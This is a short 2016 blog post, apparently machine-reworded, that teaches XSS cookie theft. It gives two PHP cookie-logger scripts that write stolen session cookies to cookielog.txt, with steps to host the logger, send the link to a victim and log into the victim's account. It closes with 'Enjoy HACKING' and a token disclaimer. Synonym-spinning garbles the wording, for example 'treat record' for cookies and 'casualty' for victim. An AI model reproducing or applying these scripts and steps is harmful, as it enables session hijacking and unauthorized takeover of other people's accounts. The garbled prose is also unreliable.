Saturday, 16 July 2016

Hi Everyone . Today i am going to share a few scripts that can help you while XXS ing a site . It is a Cookie taking script . That can hack your casualties treat record and it will permit you to sign in as the site administrator .

STEPS :-

1. Duplicate any of the underneath given script and spare it as a .php record

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookielog.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>

2. Upolad this php script to a free facilitating site .

3. Pass this connection to you casualty .

4. In the event that he taps on this connection you will get all his treat points of interest as cookielog.txt

5. Login to his accnt .

!!! Enjoy HACKING !!!

It is just for entertainment only and instructive purpose.You might be followed by this be careful before attempting.

No comments:

Post a Comment